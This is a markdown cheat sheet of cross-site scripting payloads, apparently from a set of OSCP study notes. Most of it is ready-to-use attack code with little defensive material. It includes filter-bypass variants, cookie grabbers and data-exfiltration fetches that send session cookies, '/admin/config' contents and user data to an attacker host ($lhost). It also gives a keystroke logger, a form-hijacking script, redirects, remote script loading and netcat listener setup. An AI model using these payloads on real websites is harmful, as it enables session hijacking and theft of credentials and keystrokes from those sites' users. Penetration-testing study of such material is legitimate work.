7.2.Cross-Site-Scripting.md

Cross-Site Scripting (XSS)

Table of Contents

• XSS Types
  • Reflected XSS
  • Stored XSS
  • DOM-Based XSS
• Basic Payloads
• Cookie Stealing
• Keylogger
• Filter Bypass
• DOM Manipulation

---

XSS Types

Quick Check (One-liner)

# Test basic XSS vectors
for payload in "<script>alert(1)</script>" "<img src=x onerror=alert(1)>" "<svg onload=alert(1)>"; do echo "$payload"; done

Reflected XSS

• Payload is included in the request and reflected in the response
• Not persistent, requires victim to click malicious link

Stored XSS

• Payload is stored on the server (database, comments, etc.)
• Persistent, affects all users who view the content

Stored XSS Payloads (Comments, Profiles, Posts)

<script>alert('XSS')</script>
<img src=x onerror="alert('Stored XSS')">
<svg onload="alert('Stored XSS')">

Fetch Sensitive Data with Credentials

<img src=x onerror="fetch('/secret/flag.txt',{credentials:'include'}).then(r=>r.text()).then(t=>alert(t)).catch(e=>alert('err:'+e))">

Exfiltrate Data to Attacker Server

<img src=x onerror="fetch('/api/user',{credentials:'include'}).then(r=>r.text()).then(t=>fetch('http://$lhost/?data='+btoa(t)))">
<script>fetch('/admin/config',{credentials:'include'}).then(r=>r.json()).then(d=>navigator.sendBeacon('http://$lhost/exfil',JSON.stringify(d)))</script>

Session Hijacking via Stored XSS

<script>fetch('http://$lhost/steal?cookie='+document.cookie)</script>
<img src=x onerror="new Image().src='http://$lhost/?c='+document.cookie">

DOM-Based XSS

• Payload is executed via client-side JavaScript
• Never sent to the server

---

Basic Payloads

<script>alert('XSS')</script>
<script>alert(document.domain)</script>
<script>alert(window.origin)</script>
<script>print()</script>

HTML Tag Based

<img src=x onerror=alert('XSS')>
<img src="" onerror=alert(window.origin)>
<svg onload=alert('XSS')>
<body onload=alert('XSS')>
<input onfocus=alert('XSS') autofocus>
<marquee onstart=alert('XSS')>
<video src=x onerror=alert('XSS')>
<audio src=x onerror=alert('XSS')>
<details open ontoggle=alert('XSS')>
<iframe src="javascript:alert('XSS')">

Event Handlers

<div onmouseover="alert('XSS')">Hover me</div>
<a href="#" onclick="alert('XSS')">Click me</a>
<form action="javascript:alert('XSS')"><input type=submit>

Without Parentheses

<script>alert`XSS`</script>
<img src=x onerror=alert`XSS`>

Plaintext Tag

<plaintext>

---

Cookie Stealing

Basic Cookie Grabber

<script>fetch('http://$lhost/?cookie=' + document.cookie);</script>
<script>new Image().src="http://$lhost/?c="+document.cookie;</script>
<script>document.location='http://$lhost/?c='+document.cookie;</script>

Base64 Encoded

<script>fetch('http://$lhost/?cookie=' + btoa(document.cookie));</script>

Image Tag

<img src=x onerror="this.src='http://$lhost/?c='+document.cookie">

Setup Listener

python3 -m http.server 80
nc -lvnp 80

---

Keylogger

Basic Keylogger

<script>
document.onkeypress = function(e) {
    fetch('http://$lhost/log?key=' + e.key);
}
</script>

Form Hijacking

<script>
document.forms[0].onsubmit = function() {
    fetch('http://$lhost/log?data=' + btoa(new FormData(this)));
}
</script>

---

Filter Bypass

Case Variation

<ScRiPt>alert('XSS')</ScRiPt>
<SCRIPT>alert('XSS')</SCRIPT>
<sCrIpT>alert(1)</ScRipt>

Encoding

<!-- URL Encoding -->
%3Cscript%3Ealert('XSS')%3C/script%3E

<!-- HTML Entity Encoding -->
&lt;script&gt;alert('XSS')&lt;/script&gt;

<!-- Unicode Encoding -->
<script>\u0061lert('XSS')</script>

Breaking Tags

<scr<script>ipt>alert('XSS')</scr</script>ipt>
<<script>script>alert('XSS')</script>

Without Script Tags

<img src=x onerror=alert('XSS')>
<svg/onload=alert('XSS')>
<body/onload=alert('XSS')>

JavaScript Protocol

<a href="javascript:alert('XSS')">Click</a>
<iframe src="javascript:alert('XSS')">
<form action="javascript:alert('XSS')">

Data Protocol

<a href="data:text/html,<script>alert('XSS')</script>">Click</a>
<object data="data:text/html,<script>alert('XSS')</script>">

SVG

<svg><script>alert('XSS')</script></svg>
<svg onload="alert('XSS')">
<svg><image href="x" onerror="alert('XSS')"/></svg>

Null Bytes

<scri%00pt>alert('XSS')</script>

---

DOM Manipulation

Change Background

<script>document.body.style.background = "#141d2b"</script>
<script>document.body.background = "https://example.com/image.svg"</script>

Change Title

<script>document.title = 'Hacked'</script>

Replace Body Content

<script>document.getElementsByTagName('body')[0].innerHTML = 'Hacked!'</script>
<script>document.body.innerHTML = '<h1>Hacked!</h1>'</script>

Remove Elements

<script>document.getElementById('login-form').remove();</script>
<script>document.querySelector('.password').remove();</script>

Redirect

<script>window.location = 'http://$lhost/'</script>
<script>document.location.href = 'http://$lhost/'</script>

Load External Script

<script src="http://$lhost/script.js"></script>

---

Payload Cheat Sheet

Payload	Description
<script>alert('XSS')</script>	Basic XSS
<img src=x onerror=alert('XSS')>	Image error handler
<svg onload=alert('XSS')>	SVG onload
javascript:alert('XSS')	JavaScript protocol
<script>fetch('url?c='+document.cookie)</script>	Cookie stealing
<plaintext>	Break page rendering
<script>document.location='url'</script>	Redirect

---

📚 See Also

Related Web Attacks

• Web Application Analysis - Reconnaissance and vulnerability discovery
• CSRF - Cross-Site Request Forgery (often combined with XSS)
• SQL Injection - Database attacks

Defensive & Testing

• OSCP Exam Guide - Exam methodology